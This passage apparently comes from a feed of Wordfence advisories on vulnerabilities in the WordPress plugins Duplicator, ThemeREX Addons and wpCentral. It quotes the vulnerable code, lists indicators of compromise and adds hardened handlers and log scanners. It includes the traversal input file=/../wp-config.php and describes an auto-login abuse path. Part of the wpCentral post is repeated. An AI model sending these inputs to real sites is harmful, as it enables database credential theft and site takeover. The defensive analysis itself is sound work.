Unfortunately the duplicator_download action was registered via wp_ajax_nopriv_ and was accessible to unauthenticated users. To make things worse, no validation limited the filepaths being downloaded. The file parameter is passed through sanitize_text_field and appended to the plugin constant DUPLICATOR_SSDIR_PATH, but directory traversal was still possible. An attacker could access files outside of Duplicator’s intended directory by submitting values like ../../../file.php to navigate throughout the server’s file structure.

In addition to the AJAX action, the same vulnerability existed in Duplicator’s duplicator_init() function, which is called by WordPress’s init hook.

function duplicator_init() {
    if (isset($_GET['action']) && $_GET['action'] == 'duplicator_download') {
        $file = sanitize_text_field($_GET['file']);
        $filepath = DUPLICATOR_SSDIR_PATH.'/'.$file;
        // Process download
        if(file_exists($filepath)) {
            // Clean output buffer
            if (ob_get_level() !== 0 && @ob_end_clean() === FALSE) {
                @ob_clean();
            }

            header('Content-Description: File Transfer');
            header('Content-Type: application/octet-stream');
            header('Content-Disposition: attachment; filename="'.basename($filepath).'"');
            header('Expires: 0');
            header('Cache-Control: must-revalidate');
            header('Pragma: public');
            header('Content-Length: ' . filesize($filepath));
            flush(); // Flush system output buffer

            try {
                $fp = @fopen($filepath, 'r');
                if (false === $fp) {
                    throw new Exception('Fail to open the file '.$filepath);
                }
                while (!feof($fp) && ($data = fread($fp, DUPLICATOR_BUFFER_READ_WRITE_SIZE)) !== FALSE) {
                    echo $data;
                }
                @fclose($fp);
            } catch (Exception $e) {
                readfile($filepath);
            }
            exit;
        } else {
            wp_die('Invalid installer file name!!');
        }
    }
}
add_action('init', 'duplicator_init');

Because it was hooked into init, this function was executed on every WordPress page load for logged-in users and unauthenticated visitors alike. This means an attacker could trigger a file download by adding query strings to any path on a vulnerable site, bypassing AJAX-specific monitoring.

Both of these vulnerable cases have been patched as of Duplicator 1.3.28. The AJAX action has been updated to properly validate filenames, and now requires a matching ID and hash to allow the file download. The duplicator_init() function has been removed entirely.
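As an added illustration of how such a handler can be written so that the requested name cannot escape the package directory, the following is my own example, not Duplicator's 1.3.28 patch (which the post describes as matching an ID and hash). It reuses the plugin constant DUPLICATOR_SSDIR_PATH; the nonce action name duplicator_download, the manage_options capability and the extension allowlist are assumptions made for this example.

```php
<?php
// Added example, not Duplicator's own code. Assumes DUPLICATOR_SSDIR_PATH is
// defined by the plugin and that the dashboard button carries a nonce created
// with wp_create_nonce( 'duplicator_download' ) (assumed action name).

/**
 * Resolve $file inside $base_dir. Returns the canonical path, or null when the
 * value is not a bare file name, has a disallowed extension, does not exist,
 * or resolves outside $base_dir once symlinks and ".." are canonicalized.
 */
function duplicator_safe_package_path( $base_dir, $file ) {
    // A bare file name only: any directory component ("../", "..\", "/etc/..")
    // makes basename() differ from the input and is rejected outright.
    if ( ! is_string( $file ) || '' === $file || basename( $file ) !== $file ) {
        return null;
    }
    // Duplicator's downloadable artifacts are archives and the installer
    // script; the allowlist below is an assumption for this example.
    $ext = strtolower( pathinfo( $file, PATHINFO_EXTENSION ) );
    if ( ! in_array( $ext, array( 'zip', 'daf', 'php' ), true ) ) {
        return null;
    }
    $base = realpath( $base_dir );
    $path = realpath( $base_dir . DIRECTORY_SEPARATOR . $file );
    if ( false === $base || false === $path || ! is_file( $path ) ) {
        return null;
    }
    // Containment check on canonical paths: the file must sit directly in
    // the package directory, so a symlink pointing elsewhere is refused too.
    if ( dirname( $path ) !== $base ) {
        return null;
    }
    return $path;
}

function hardened_duplicator_download() {
    // Only administrators may fetch packages, and only with a valid nonce
    // (CSRF protection for the dashboard button).
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions', '', array( 'response' => 403 ) );
    }
    check_ajax_referer( 'duplicator_download', 'nonce' );

    $requested = isset( $_GET['file'] ) ? wp_unslash( $_GET['file'] ) : '';
    $path      = duplicator_safe_package_path( DUPLICATOR_SSDIR_PATH, $requested );
    if ( null === $path ) {
        wp_die( 'Invalid package file name', '', array( 'response' => 400 ) );
    }

    nocache_headers();
    header( 'Content-Type: application/octet-stream' );
    header( 'Content-Disposition: attachment; filename="' . basename( $path ) . '"' );
    header( 'Content-Length: ' . filesize( $path ) );
    readfile( $path );
    exit;
}

// Registered for authenticated requests only: no wp_ajax_nopriv_ hook exists
// for this action, so unauthenticated visitors never reach the handler.
add_action( 'wp_ajax_duplicator_download', 'hardened_duplicator_download' );
```

The containment test is deliberately done on the output of realpath() rather than on the input string: sanitize_text_field() leaves "../" untouched, and a string-level check would still miss a symlink placed in the package directory, whereas comparing canonical paths catches both.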

Attackers Stealing Database Credentials

Arbitrary file download vulnerabilities can be a critical issue regardless of the vulnerable site’s platform, but such attacks against WordPress sites largely target one file: wp-config.php.

Depending on the site, wp-config.php can contain any amount of custom code, but attackers target it to access a site’s database credentials. With these credentials, an attacker can directly access the victim site’s database if it allows remote connections. This access can be used by an attacker to create their own Administrator account and further compromise the site, or simply to inject content or harvest data.

Sites with local databases still have cause for concern, however. On shared hosting environments, it’s possible for one user on a shared server to access the local database of another site on the same server. This certainly limits the attack surface of the vulnerable site, but is still a severe issue.

At the time of this writing, Wordfence has blocked more than 60,000 attempts to download wp-config.php files with this vulnerability. About 50,000 of these events took place before Duplicator patched the flaw, making this a zero-day vulnerability.

Nearly all of these attacks were issued from the same IP address: 77.71.115.52. This IP points to a webserver located in Bulgaria, owned by Varna Data Center EOOD. A handful of websites are hosted on this server, suggesting the attacker could be proxying their attacks through a compromised website. We have associated this IP address with other malicious activity against WordPress recently, and research into its activity is ongoing.

Indicators Of Compromise (IOCs)

The following Indicators of Compromise (IOCs) can be used to determine if your site may have been attacked.

  • Traffic logged from the threat actor’s IP address should be considered suspicious:
    • 77.71.115.52
  • Attacks in this campaign are issued via GET requests with the following query strings:
    • action=duplicator_download
    • file=/../wp-config.php
    • Note: Because this vulnerability can be exploited via WP AJAX, it’s possible to exploit via POST request. In this case, it’s possible for the action parameter to be passed in the POST body instead of the query string. This will prevent the action=duplicator_download string from appearing in HTTP logs. The file parameter must be passed as a query string, however, and is a reliable indicator.
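The indicators above can be checked mechanically against web-server access logs. The following is an added example written for this post, not a Wordfence tool; the log lines are constructed, 77.71.115.52 is the address named above, and the other addresses are documentation ranges.

```php
<?php
// Added example (not from the Wordfence post): flag access-log lines carrying
// the Duplicator IOCs. Sample log lines are constructed for this example.

const DUPLICATOR_IOC_IP = '77.71.115.52'; // address named in the post

/**
 * Return the indicators found in one combined-format log line
 * (Apache/nginx style: ip ident user [time] "METHOD URI PROTO" status ...).
 */
function duplicator_ioc_hits( $line ) {
    $hits = array();
    if ( ! preg_match( '/^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})/', $line, $m ) ) {
        return array( 'unparsed line' );
    }
    $ip  = $m[1];
    $uri = $m[3];

    if ( DUPLICATOR_IOC_IP === $ip ) {
        $hits[] = 'known attacker ip';
    }

    $params = array();
    $query  = parse_url( $uri, PHP_URL_QUERY );
    if ( is_string( $query ) ) {
        parse_str( $query, $params ); // decodes percent-encoding once
    }
    if ( isset( $params['action'] ) && 'duplicator_download' === $params['action'] ) {
        $hits[] = 'action=duplicator_download';
    }
    // The action may travel in a POST body and never reach the log, but the
    // file parameter is always in the query string, so it is checked on its own.
    if ( isset( $params['file'] ) && is_string( $params['file'] ) ) {
        // Decoding a second time also catches double-encoded "%252e%252e/".
        $file = rawurldecode( $params['file'] );
        if ( preg_match( '#(^|[/\\\\])\.\.([/\\\\]|$)#', $file ) ) {
            $hits[] = 'directory traversal in file=';
        }
        if ( false !== stripos( $file, 'wp-config' ) ) {
            $hits[] = 'wp-config.php requested';
        }
    }
    return $hits;
}

/** Scan many lines; returns only the lines that produced at least one hit. */
function duplicator_scan_log( array $lines ) {
    $flagged = array();
    foreach ( $lines as $n => $line ) {
        $hits = duplicator_ioc_hits( $line );
        if ( $hits ) {
            $flagged[ $n ] = $hits;
        }
    }
    return $flagged;
}

// Constructed sample log: one AJAX GET exploit attempt, one POST with the
// action hidden in the body (only file= is visible), and one benign request.
$sample_log = array(
    '203.0.113.5 - - [12/Feb/2020:10:00:00 +0000] "GET /wp-admin/admin-ajax.php?action=duplicator_download&file=/../wp-config.php HTTP/1.1" 200 3121 "-" "Mozilla/5.0"',
    '77.71.115.52 - - [12/Feb/2020:10:00:01 +0000] "POST /?file=/../wp-config.php HTTP/1.1" 200 3121 "-" "curl/7.64.0"',
    '198.51.100.7 - - [12/Feb/2020:10:00:02 +0000] "GET /index.php?p=42 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
);

foreach ( duplicator_scan_log( $sample_log ) as $n => $hits ) {
    printf( "line %d: %s\n", $n + 1, implode( ', ', $hits ) );
}
```

Run against the constructed sample, the first line is reported for the action, the traversal and the wp-config name; the second line has no action in its query string but is still caught by the file parameter and the source address, which is the point of the note above; the third line produces no output.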

Timeline

  • February 10th, 2020 – First attacks against Duplicator vulnerability. Wordfence users already safe due to built-in firewall protection.
  • February 12th, 2020 – Duplicator releases version 1.3.28 to patch the flaw.

Conclusion

Duplicator’s massive install base, combined with the ease of exploiting this vulnerability, makes this flaw a noteworthy target for hackers. It’s crucial that Duplicator’s users update their plugins to the latest available version as soon as possible to remove this risk. All Wordfence users are protected from these attacks, but don’t forget to update despite this. Also, due to the nature of Duplicator’s functionality, it’s likely that it’s no longer required on your site. If you have no intent of using it to migrate or clone your site in the immediate future, you can delete the plugin without worry. It can always be reinstalled later if needed.

If you believe your site was attacked via this vulnerability, it’s critical that you change your database credentials and WordPress salts immediately. If you’re concerned that an attacker may have gained unauthorized access to your site, consider having our expert analysts perform a Site Security Audit to ensure your security is intact.

The post Active Attack on Recently Patched Duplicator Plugin Vulnerability Affects Over 1 Million Sites appeared first on Wordfence.

Zero-Day Vulnerability in ThemeREX Addons Plugin Exploited in the Wild

Description: Remote Code Execution
Affected Plugin: ThemeREX Addons
Affected Versions: Versions greater than 1.6.50
CVSS Score: 9.8 (Critical)
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Patched Version: Currently No Patch.

Today, February 18th, our Threat Intelligence team was notified of a vulnerability present in ThemeREX Addons, a WordPress plugin installed on an estimated 44,000 sites. This flaw allows attackers to remotely execute code on a site with the plugin installed, including the ability to execute code that can inject administrative user accounts.

At the time of writing, this vulnerability is being actively exploited, so we urge site owners running a version greater than 1.6.50 to temporarily remove the ThemeREX Addons plugin until a patch has been released.

Wordfence Premium customers received a new firewall rule today, February 18th, 2020, at 3:16PM UTC to protect against exploits targeting this vulnerability. Free Wordfence users will receive the rule after thirty days on March 19th, 2020.

REST-API Endpoint Unprotected and Improperly Configured

ThemeREX Addons is a plugin installed as a companion to many ThemeREX themes and provides a number of theme management features. One of the plugin’s functions registers a WordPress REST-API endpoint. When doing so, it does not verify that a request is coming from an administrative user.

While this is not cause for concern on its own, the endpoint allows any WordPress function to be executed, rather than being limited to a select few functions. This means that remote code can be executed by any visitor, even those that are not authenticated to the site. The most worrisome capability that we are seeing actively attacked is the ability to create a new administrative user, which can be used for complete site takeover.
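For contrast with the two problems just described (no permission check, and any function callable by name), the following added example shows how a REST route of this kind is registered safely. It is not ThemeREX code; the namespace example-addons/v1, the route, the function names and the two allowlisted actions are invented for illustration.

```php
<?php
// Added example, not ThemeREX code. Names below are invented for illustration.

/**
 * Fixed map from action names accepted by the endpoint to the PHP callables
 * they run. The request only ever supplies a key of this map; it can never
 * name a PHP function directly.
 */
function example_addons_allowed_actions() {
    return array(
        'flush_cache'   => 'wp_cache_flush',
        'flush_rewrite' => 'flush_rewrite_rules',
    );
}

function example_addons_run_action( WP_REST_Request $request ) {
    $map    = example_addons_allowed_actions();
    $action = $request->get_param( 'action' );
    if ( ! is_string( $action ) || ! isset( $map[ $action ] ) ) {
        return new WP_Error( 'example_unknown_action', 'Unknown action.', array( 'status' => 400 ) );
    }
    call_user_func( $map[ $action ] );
    return rest_ensure_response( array( 'ran' => $action ) );
}

add_action( 'rest_api_init', function () {
    register_rest_route( 'example-addons/v1', '/action', array(
        'methods'             => 'POST',
        'callback'            => 'example_addons_run_action',
        // The control missing from the flaw described above: without a
        // permission_callback (or with __return_true) every visitor,
        // authenticated or not, may call this route.
        'permission_callback' => function () {
            return current_user_can( 'manage_options' );
        },
        // Schema validation rejects anything outside the allowlist before
        // the callback runs.
        'args'                => array(
            'action' => array(
                'required' => true,
                'type'     => 'string',
                'enum'     => array_keys( example_addons_allowed_actions() ),
            ),
        ),
    ) );
} );
```

Two design points carry the weight here: the permission callback binds the route to a capability rather than to "being logged in", and the action parameter is an enum over a fixed map, so adding a capability to the endpoint means editing the map rather than trusting whatever the request names. Dashboard callers authenticating with cookies must also send the REST nonce in the X-WP-Nonce header, which WordPress checks before current_user_can() reports anything other than a logged-out user.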

Indicators of Compromise

We currently have very little data on who is exploiting this vulnerability and what artifacts are being left behind, however, we do know that attacks are targeting administrative user account creation. If you are running the ThemeREX Addons plugin on your site and you discover a new suspicious administrative account, it is very likely that your site was compromised as a result of this vulnerability. We will provide more information as details emerge.

Conclusion

We have intentionally provided minimal details in this post in an attempt to keep exploitation to a bare minimum while also informing WordPress site owners of this active campaign. We will release a follow-up post with further details once the developer patches this vulnerability.

For the time being, we urge that site owners running the ThemeREX Addons plugin remove it from their sites immediately. Sites running Wordfence Premium have been protected from attacks against this vulnerability since February 18th, 2020. Sites running the free version of Wordfence will receive the firewall rule update on March 19th, 2020.

The post Zero-Day Vulnerability in ThemeREX Addons Plugin Exploited in the Wild appeared first on Wordfence.

Vulnerability in wpCentral Plugin Leads to Privilege Escalation

Description: Improper Access Control to Privilege Escalation
Affected Plugin: wpCentral
Affected Versions: <= 1.5.0
CVE ID: CVE-2020-9043
CVSS Score: 8.8 (High)
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Patched Version: 1.5.1

On February 13th, our Threat Intelligence team discovered a vulnerability in wpCentral, a WordPress plugin installed on over 60,000 sites. The flaw allowed any logged-in user to escalate their privileges to those of an administrator, including subscriber-level users, provided open registration was enabled on a WordPress site with the vulnerable plugin installed.

The flaw also allowed for remote control of the site via the wpCentral administrative dashboard. This would be considered an improper access control vulnerability that led to privilege escalation. We privately disclosed the full details to the plugin’s developer on February 13th, and they reacted promptly by releasing a patch the next day along with a few additional security enhancements.

This is a high severity security issue that could have a severe impact on your site. We highly recommend updating to the latest version, 1.5.2, immediately.

Wordfence Premium customers received a new firewall rule on February 14th to protect against exploits targeting this vulnerability. Free Wordfence users will receive the rule after thirty days, on March 15th.

What is wpCentral?

wpCentral is a WordPress plugin that was designed to be used in tandem with the wpCentral management dashboard to provide a connection between WordPress sites and a management interface. Their software is designed to make site management easy, with functionalities including automated sign-on with one click from the wpCentral dashboard, the ability to create back-ups, edit posts (in the premium version), and much more.

In order to provide this connection between the site and the management dashboard, the plugin generates a random 128 character authorization key, stored as the wpcentral_auth_key, also referred to as the “connection key.” This key is used to add a site to the wpCentral dashboard, in addition to being used as the auth_key when sending requests from the wpCentral dashboard. It is an important part of the authentication and authorization process, and because of its capabilities, it requires strict protections to prevent unauthorized use.

Connection Key Always Displayed in Admin Footer

Unfortunately, we discovered that there were weak access controls in place to protect the connection key as it was displayed in the admin_footer in a modal dialog.

 add_action('admin_footer', 'wpc_modal_dialog');

The admin footer fires on any page that is part of the administrative interface and will display whatever is hooked into that area. However, it does not verify that the user has ‘administrator’ capabilities: a common misconception about the family of hooks and functions whose names contain `admin`. This meant that any logged-in user, regardless of capabilities, could view any content in the modal dialog displayed as part of the admin_footer.

The modal dialog box that was displayed as part of the admin footer exposed the connection key along with steps that could be used to connect a site to wpCentral.

function wpc_modal_dialog(){
    
	$mdialog = '
	<div id="wpc_connection_key_dialog" style="display: none;">
		<p>Follow the steps here to connect your website to wpcentral dashboard:</p>
		<ol>
			<li>Copy the connection key below</li>
			<li>Log into your <a href="https://panel.wpcentral.co/" target="_blank">wpcentral</a> account</li>
			<li>Click on Add website to add your website to wpcentral.</li>
			<li>Enter this website\'s URL and paste the Connection key given below.</li>
			<li>You can also follow our guide for the same <a href="https://wpcentral.co/docs/getting-started/adding-website-in-wpcentral/" target="_blank">here</a>.</li>
		</ol>
		
		<p style="font-weight:bold;">Note: Contact wpCentral Team at support@wpcentral.co for any issues</p>

		<div style="text-align:center; font-weight:bold;"><p style="margin-bottom: 4px;margin-top: 20px;">wpCentral Connection Key</p></div>
		<div style="padding: 10px;background-color: #fafafa;border: 1px solid black;border-radius: 10px;font-weight: bold;font-size: 14px;text-align: center;">'.wpc_get_connection_key().'</div>
	</div>';

This meant that an attacker with minimal, subscriber-level permissions would have the ability to add a vulnerable site to their wpCentral dashboard and take remote control over the site. They could do things like create a backup and then steal the information out of the wp-config.php file to obtain access to the database or gain access to sensitive information.

Auto-login Capabilities Unprotected

The worst thing an attacker could do if they were able to gain access to the auth_key was to auto sign-on, a feature common amongst WordPress management dashboards.

 add_action('wp_ajax_nopriv_my_wpc_signon', 'my_wpc_signon');

This functionality was intended to be used from the wpCentral dashboard, where a user simply clicks a button to authenticate; however, it only sent a request that any user could replicate. The authorization check merely compared the supplied auth_key with the one stored in the options table as wpcentral_auth_key. This key is persistent, so if compromised, it would authorize any user to send requests on behalf of a site administrator.

/**
 * Check for the authorization of the request using the auth key
 *
 * @returns		bool
 * @since		1.0
 */
function wpc_authorize(){
    global $l, $error;
	
	$return = array(); 
    
    $auth_key = wpc_optREQ('auth_key');
	if(empty($auth_key)){
		$return['error'] = 'Unauthorized Access!!';
		echo json_encode($return);
		die();
	}
	
	$verify_authkey = wpc_get_option('wpcentral_auth_key');
	if($auth_key != $verify_authkey){
		$return['error'] = $l['invalid_auth_key'];
		echo json_encode($return);
		die();
	}
}

When a correctly formatted request was sent with the proper authorization key, a user would be automatically signed on as user 1 in the database. This is the first user account created on a site and is typically one of the primary administrative users. Once signed on, an attacker would have free rein and could inject backdoors, take down the site, and much more.

/**
 * Provides access to the website's admin panel
 *
 * @returns		bool
 * @since		1.0
 */
function my_wpc_signon(){
    global $l, $error;
	
	//Authorize
	wpc_authorize();
	
	$user_info = get_userdata(1);
		
	// Automatic login //
	$username = $user_info->user_login;
	$user = get_user_by('login', $username );
	
	// Redirect URL //
	if (!is_wp_error($user)){
		wp_clear_auth_cookie();
		wp_set_current_user($user->ID);
		wp_set_auth_cookie($user->ID);

		$redirect_to = user_admin_url();
		wp_safe_redirect($redirect_to);

		exit();
	}
}
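The following added example shows the two controls the analysis above calls for: a capability check in front of the admin_footer dialog, and a constant-time comparison of the connection key, plus a key rotation routine of the kind the update performs. It is my own illustration, not the wpCentral developer's patch (which the post describes as an IP check and disabling auto sign-on). It assumes the plugin's wpc_modal_dialog() and wpc_get_option() shown above; the names wpc_modal_dialog_guarded, wpc_key_matches, wpc_authorize_hardened and wpc_rotate_connection_key are invented.

```php
<?php
// Added example, not wpCentral's own patch. Assumes the plugin's
// wpc_modal_dialog() and wpc_get_option() helpers shown above.

// Emit the connection-key dialog only for users who may manage the site.
// admin_footer fires for every logged-in user who can reach wp-admin, so the
// capability check has to be explicit. This replaces the plugin's own
// add_action( 'admin_footer', 'wpc_modal_dialog' ) line.
function wpc_modal_dialog_guarded() {
    if ( ! current_user_can( 'manage_options' ) ) {
        return;
    }
    wpc_modal_dialog();
}
add_action( 'admin_footer', 'wpc_modal_dialog_guarded' );

/**
 * Compare a presented key with the stored one. hash_equals() replaces the
 * loose "!=" of the original: it performs no PHP type juggling and takes the
 * same time whether the first or the last byte differs.
 */
function wpc_key_matches( $presented, $stored ) {
    if ( ! is_string( $presented ) || ! is_string( $stored ) || '' === $stored ) {
        return false; // an unset key must never authorize anything
    }
    return hash_equals( $stored, $presented );
}

// Same contract as the original wpc_authorize(): returns only on success,
// otherwise ends the request with a JSON error.
function wpc_authorize_hardened() {
    $auth_key = isset( $_REQUEST['auth_key'] ) ? (string) wp_unslash( $_REQUEST['auth_key'] ) : '';
    $stored   = (string) wpc_get_option( 'wpcentral_auth_key' );
    if ( ! wpc_key_matches( $auth_key, $stored ) ) {
        wp_send_json_error( array( 'error' => 'Unauthorized Access!!' ), 403 );
    }
}

/**
 * Replace the stored key with a fresh random 128-character value, as the post
 * notes the plugin update does; useful after any suspected exposure.
 */
function wpc_rotate_connection_key() {
    $new_key = wp_generate_password( 128, false );
    update_option( 'wpcentral_auth_key', $new_key );
    return $new_key;
}
```

The capability gate addresses the disclosure; the comparison addresses how the key is checked; rotation limits the lifetime of any key that was already read before the gate was in place, which is why the post recommends updating even on sites that show no sign of misuse.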

Fortunately, in the latest version of wpCentral, the developer implemented a check that ensures that requests are being sent from the wpCentral server’s IP address. This ensures that if a connection key is compromised, mass exploitation would be much harder to conduct as requests need to come from the wpCentral dashboard rather than a simple query. Additionally, the auto sign-on feature appears to have been disabled for the time being.

Proof of Concept Walkthrough

Very Important to Update Immediately

Due to the unique nature of this vulnerability, it was difficult to create a firewall rule that provided complete protection, as we did not want to block legitimate plugin functionality. Although we do have a firewall rule in place to help protect your site, it cannot provide complete protection. Note that, as part of the plugin update, your wpCentral key will be reset, preventing attackers from retaining unauthorized access to your site if the connection key was previously compromised. For these reasons, we highly recommend updating to the latest version as soon as possible to ensure your site is secure.

Disclosure Timeline

February 13th, 2020 – Vulnerability initially discovered and analyzed. Initial outreach to developer.
February 14th, 2020 – Developer responds and full details are sent. Firewall rule released for Wordfence Premium users.
February 14th, 2020 – Patch released.
March 15th, 2020 – Wordfence free users receive firewall rule.

Conclusion

In today’s post, we detail a privilege escalation flaw in the wpCentral plugin. This flaw has been patched in version 1.5.1, however, we recommend that users update to the latest version (1.5.2) available immediately. Sites running Wordfence Premium have been protected from attacks against this vulnerability since February 14th, 2020. Sites running the free version of Wordfence will receive the firewall rule update on March 15th, 2020.

The post Vulnerability in wpCentral Plugin Leads to Privilege Escalation appeared first on Wordfence.


The admin footer checks to see if a page being accessed is part of the administrative interface and will display whatever is requested in that area. However, it does not verify that the user has ‘administrator’ capabilities — a common misconception with the series of functions that contain the label `admin`. This meant that any user logged in, regardless of capabilities, would have access to view any content in the modal dialog that was displayed as part of the admin_footer.

The modal dialog box that was displayed as part of the admin footer exposed the connection key along with steps that could be used to connect a site to wpCentral.

function wpc_modal_dialog(){
    
	$mdialog = '
	<div id="wpc_connection_key_dialog" style="display: none;">
		<p>Follow the steps here to connect your website to wpcentral dashboard:</p>
		<ol>
			<li>Copy the connection key below</li>
			<li>Log into your <a href="https://panel.wpcentral.co/" target="_blank">wpcentral</a> account</li>
			<li>Click on Add website to add your website to wpcentral.</li>
			<li>Enter this website\'s URL and paste the Connection key given below.</li>
			<li>You can also follow our guide for the same <a href="https://wpcentral.co/docs/getting-started/adding-website-in-wpcentral/" target="_blank">here</a>.</li>
		</ol>
		
		<p style="font-weight:bold;">Note: Contact wpCentral Team at support@wpcentral.co for any issues</p>

		<div style="text-align:center; font-weight:bold;"><p style="margin-bottom: 4px;margin-top: 20px;">wpCentral Connection Key</p></div>
		<div style="padding: 10px;background-color: #fafafa;border: 1px solid black;border-radius: 10px;font-weight: bold;font-size: 14px;text-align: center;">'.wpc_get_connection_key().'</div>
	</div>';

This meant that an attacker with minimal, subscriber-level permissions would have the ability to add a vulnerable site to their wpCentral dashboard and take remote control over the site. They could do things like create a backup and then steal the information out of the wp-config.php file to obtain access to the database or gain access to sensitive information.

Auto-login Capabilities Unprotected

The worst thing an attacker could do if they were able to gain access to the auth_key was to auto sign-on, a feature common amongst WordPress management dashboards.

 add_action('wp_ajax_nopriv_my_wpc_signon', 'my_wpc_signon');

This functionality was intended to be used as part of the wpCentral dashboard, where a user simply clicks a button to authenticate; however, that button only sent a request that could be replicated by any user. The authorization check merely verified that the supplied auth_key matched the one stored in the options table as wpcentral_auth_key. This key is persistent, so if compromised, it would authorize any user to send requests on behalf of a site administrator.

/**
 * Check for the authorization of the request using the auth key
 *
 * @returns		bool
 * @since		1.0
 */
function wpc_authorize(){
    global $l, $error;
	
	$return = array(); 
    
    $auth_key = wpc_optREQ('auth_key');
	if(empty($auth_key)){
		$return['error'] = 'Unauthorized Access!!';
		echo json_encode($return);
		die();
	}
	
	$verify_authkey = wpc_get_option('wpcentral_auth_key');
	if($auth_key != $verify_authkey){
		$return['error'] = $l['invalid_auth_key'];
		echo json_encode($return);
		die();
	}
}

When a correctly formatted request was sent with the proper authorization key, a user would be automatically signed on as user 1 in the database. This is the first user account created on a site and is typically one of the primary administrative users. Once signed on, an attacker would have free rein and could inject backdoors, take down the site, and much more.

/**
 * Provides access to the website's admin panel
 *
 * @returns		bool
 * @since		1.0
 */
function my_wpc_signon(){
    global $l, $error;
	
	//Authorize
	wpc_authorize();
	
	$user_info = get_userdata(1);
		
	// Automatic login //
	$username = $user_info->user_login;
	$user = get_user_by('login', $username );
	
	// Redirect URL //
	if (!is_wp_error($user)){
		wp_clear_auth_cookie();
		wp_set_current_user($user->ID);
		wp_set_auth_cookie($user->ID);

		$redirect_to = user_admin_url();
		wp_safe_redirect($redirect_to);

		exit();
	}
}

Fortunately, in the latest version of wpCentral, the developer implemented a check that ensures that requests are being sent from the wpCentral server’s IP address. This ensures that if a connection key is compromised, mass exploitation would be much harder to conduct as requests need to come from the wpCentral dashboard rather than a simple query. Additionally, the auto sign-on feature appears to have been disabled for the time being.
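A defender-side check derived from the two handlers above, added here as an example and not part of the original post or of wpCentral's code: it scans access-log lines for the nopriv sign-on action from addresses outside an assumed dashboard allowlist, and uses the response code to tell rejected keys (JSON error, HTTP 200) from accepted ones (redirect, HTTP 302). The allowlist address and the log lines are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed allowlist of wpCentral dashboard source addresses: the post does not
# list them, so this is a placeholder to be replaced with the real ranges.
WPCENTRAL_ALLOWLIST = {"203.0.113.10"}

# The nopriv AJAX action discussed in the post.
WATCHED_ACTIONS = {"my_wpc_signon"}

# Apache/nginx "combined" access-log prefix: client IP, timestamp, request, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)


def parse_line(line):
    """Return the fields we need from one access-log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    query = parse_qs(parts.query)
    return {
        "ip": m.group("ip"),
        "method": m.group("method"),
        "path": parts.path,
        "action": query.get("action", [None])[0],
        "status": int(m.group("status")),
    }


def classify(entry):
    """Label one parsed request, or return None when nothing stands out.

    Caveat: only query-string parameters are visible in an access log. A POSTed
    action/auth_key never appears there, so this catches the "simple query"
    case the post describes, not every possible request shape.
    """
    if entry is None or not entry["path"].endswith("/wp-admin/admin-ajax.php"):
        return None
    if entry["action"] not in WATCHED_ACTIONS or entry["ip"] in WPCENTRAL_ALLOWLIST:
        return None
    # wpc_authorize() answers a bad key with a JSON error and die(), i.e. HTTP 200;
    # a successful sign-on ends in wp_safe_redirect(), i.e. HTTP 302. A 302 to an
    # address outside the dashboard allowlist means the stored key was accepted.
    if entry["status"] in (301, 302):
        return "signon-success-from-unknown-ip"
    return "signon-attempt-from-unknown-ip"


def scan(lines):
    """Run classify() over a log and collect (ip, action, status, label) tuples."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        label = classify(entry)
        if label:
            findings.append((entry["ip"], entry["action"], entry["status"], label))
    return findings


# Constructed sample traffic (not real log data); auth_key values are dummies.
SAMPLE_LOG = [
    '203.0.113.10 - - [14/Feb/2020:10:00:00 +0000] "GET /wp-admin/admin-ajax.php?action=my_wpc_signon&auth_key=DUMMY HTTP/1.1" 302 0 "-" "wpCentral"',
    '198.51.100.7 - - [14/Feb/2020:10:01:00 +0000] "GET /wp-admin/admin-ajax.php?action=my_wpc_signon&auth_key=wrong HTTP/1.1" 200 45 "-" "curl/7.68.0"',
    '198.51.100.7 - - [14/Feb/2020:10:01:30 +0000] "GET /wp-admin/admin-ajax.php?action=my_wpc_signon&auth_key=DUMMY HTTP/1.1" 302 0 "-" "curl/7.68.0"',
    '192.0.2.4 - - [14/Feb/2020:10:02:00 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 30 "-" "Mozilla/5.0"',
    '192.0.2.4 - - [14/Feb/2020:10:02:10 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A 302 finding from an unknown address is the one worth treating as a compromised connection key; the update's key reset is the remediation the post describes.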

Proof of Concept Walkthrough

Very Important to Update Immediately

Due to the unique nature of this vulnerability, it was difficult to create a firewall rule that provided complete protection, as we did not want to block legitimate plugin functionality. Although we do have a firewall rule in place to help protect your site, it cannot provide complete protection. Note that, as part of the plugin update, your wpCentral key will be reset, inhibiting attackers from maintaining unauthorized access to your site given that the connection key may have previously been compromised. For these reasons, we highly recommend updating to the latest version as soon as possible to ensure your site is secure.

Disclosure Timeline

February 13th, 2020 – Vulnerability initially discovered and analyzed. Initial outreach to developer.
February 14th, 2020 – Developer responds and full details are sent. Firewall rule released for Wordfence Premium users.
February 14th, 2020 – Patch released.
March 15th, 2020 – Wordfence free users receive firewall rule.

Conclusion

In today’s post, we detail a privilege escalation flaw in the wpCentral plugin. This flaw has been patched in version 1.5.1, however, we recommend that users update to the latest version (1.5.2) available immediately. Sites running Wordfence Premium have been protected from attacks against this vulnerability since February 14th, 2020. Sites running the free version of Wordfence will receive the firewall rule update on March 15th, 2020.

The post Vulnerability in wpCentral Plugin Leads to Privilege Escalation appeared first on Wordfence.


Episode 65: WordCamp Asia Cancellation Prompts Community Support

